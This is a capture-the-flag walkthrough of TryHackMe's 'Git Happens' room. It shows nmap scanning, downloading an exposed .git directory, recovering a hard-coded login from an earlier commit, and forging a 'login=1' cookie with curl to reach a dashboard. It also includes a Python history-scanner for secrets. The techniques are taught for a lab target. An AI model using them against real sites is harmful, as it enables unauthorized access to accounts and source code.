Tryhackme: Git Happens — WalkThrough
Today, we will be doing Git Happens from TryHackMe, a beginner-level room that teaches how version control (git) misconfigurations and careless developer mistakes can lead to serious security issues. Without further ado, let’s connect to the THM OpenVPN network and start hacking!!!
Port Scanning
┌──(kiran㉿kali)-[~]
└─$ nmap -sC -sV 10.10.201.254 -oA nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 18:17 +0545
Nmap scan report for 10.10.201.254
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-git:
| 10.10.201.254:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
An exposed .git directory was discovered by nmap’s http-git script. Navigating to that URL in the browser returned the directory listing shown below.
.git Directory Listing
Looks like a git repository. Let’s download all the files and investigate locally.
$ wget http://10.10.191.151/.git/ --recursive --no-parent
--2021-05-20 17:47:05-- http://10.10.191.151/.git/
Connecting to 10.10.191.151:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘10.10.191.151/.git/index.html’
<SNIP>
Port 80
There is a login page on port 80.
Analyzing the repository
Apart from the git directory structure, I couldn’t find any interesting files. Now, let’s use git commands to see what exactly this repository is about. The command git status shows the current state of the repo.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git status
On branch master
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        deleted:    .gitlab-ci.yml
        deleted:    Dockerfile
        deleted:    README.md
        deleted:    css/style.css
        deleted:    dashboard.html
        deleted:    default.conf
        deleted:    index.html
no changes added to commit (use "git add" and/or "git commit -a")
We can see that quite a few files were deleted from the working tree, but the deletions have not been committed, so the content is still in the repository and can be brought back with the git restore <file> command. I restored the files index.html and dashboard.html and analyzed the source code. The JavaScript code was heavily obfuscated. There must be another way.
It’s time to analyze the logs and harness the true power of a version control system: going back in time.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
<SNIP>
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
Looking back through the log, there is a commit from July 23 made right after the login page was finished, before the code was obfuscated. Let’s check out that earlier version of the code, i.e. commit 395e087334d613d5e423cdf8f7be27196a360459.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git checkout 395e087334d613d5e423cdf8f7be27196a360459
D README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 395e087 Made the login page, boss!
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ ls
css dashboard.html index.html
After analyzing the source code of index.html at this commit, the credentials for signing into the website turned out to be hard-coded in cleartext.
<script>
  function login() {
    let form = document.getElementById("login-form");
    console.log(form.elements);
    let username = form.elements["username"].value;
    let password = form.elements["password"].value;
    if (
      username === "admin" &&
      password === "<REDACTED>"
    ) {
      document.cookie = "login=1";
      window.location.href = "/dashboard.html";
    } else {
      document.getElementById("error").innerHTML =
        "INVALID USERNAME OR PASSWORD!";
    }
  }
</script>
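The two steps just shown, walking back through git log and then reading the pre-obfuscation index.html, are exactly what a repository secret scan automates. As an added example that is not part of the original walkthrough, the following Python uses only the standard library to read a repository’s loose objects directly and report password literals from every commit in the first-parent history; the two-commit repository it scans is constructed in a temp directory, and the regex, file name and the credential s3cret-example are made up for the demonstration.

```python
import hashlib, os, re, tempfile, zlib

def write_object(gitdir, kind, data):
    """Store a loose object (zlib of b'kind size\\0data') and return its SHA-1."""
    raw = f"{kind} {len(data)}\0".encode() + data
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f: f.write(zlib.compress(raw))
    return sha

def read_object(gitdir, sha):
    """Inverse of write_object: return (kind, body) for one loose object."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        header, _, body = zlib.decompress(f.read()).partition(b"\0")
    return header.split()[0].decode(), body

def tree_entries(body):
    """Yield (name, sha) from a binary tree object: b'<mode> <name>\\0<20-byte sha>'."""
    while body:
        meta, _, body = body.partition(b"\0")
        yield meta.split(b" ", 1)[1].decode(), body[:20].hex()
        body = body[20:]

SECRET_RE = re.compile(rb'password\s*===?\s*"([^"]+)"')  # literal compared to the password field
def scan_history(gitdir, head_sha):
    """Walk first-parent history from head_sha; return [(short_sha, filename, secret)]."""
    findings, sha = [], head_sha
    while sha:
        headers = read_object(gitdir, sha)[1].partition(b"\n\n")[0]
        fields = dict(line.split(b" ", 1) for line in headers.split(b"\n"))
        for name, blob in tree_entries(read_object(gitdir, fields[b"tree"].decode())[1]):
            kind, content = read_object(gitdir, blob)
            if kind == "blob":  # flat trees only; subdirectory trees are skipped
                findings += [(sha[:7], name, m.decode()) for m in SECRET_RE.findall(content)]
        sha = fields.get(b"parent", b"").decode() or None
    return findings

def build_fixture():
    """Constructed two-commit repo: a plain-JS secret, then 'hidden' by obfuscation."""
    gitdir = tempfile.mkdtemp(suffix=".git")
    def commit(js, parent, msg):
        blob = write_object(gitdir, "blob", js)
        tree = write_object(gitdir, "tree", b"100644 index.html\0" + bytes.fromhex(blob))
        hdr = f"tree {tree}\n" + (f"parent {parent}\n" if parent else "")
        hdr += "author Dev <dev@example.test> 0 +0000\ncommitter Dev <dev@example.test> 0 +0000\n"
        return write_object(gitdir, "commit", f"{hdr}\n{msg}\n".encode())
    old = commit(b'if (username === "admin" && password === "s3cret-example") {}', None, "Made the login page")
    head = commit(b'eval(atob("...obfuscated..."));', old, "Obfuscate the login check")
    return gitdir, old, head  # scan_history(gitdir, head) still finds the secret at `old`
```

Because it reads only loose objects and flat trees, pointing it at a real .git requires an unpacked repository and the HEAD commit hash; the point it makes is that a secret "removed" by a later commit is still one parent pointer away.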
After the credential check passes, the JavaScript itself sets the cookie login=1; nothing server-side issues it. Let’s present that cookie ourselves to get access to dashboard.html.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ curl http://10.10.123.54/dashboard.html -H 'Cookie: login=1' -L
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Awesome!</title>
    <link rel="stylesheet" href="/css/style.css" />
  </head>
  <body onload="checkCookie()">
    <p class="rainbow-text">Awesome! Use the password you input as the flag!</p>
As it says, the password we recovered from the repository history is the flag to submit for the challenge.
Happy Hacking!!
Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion.
I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.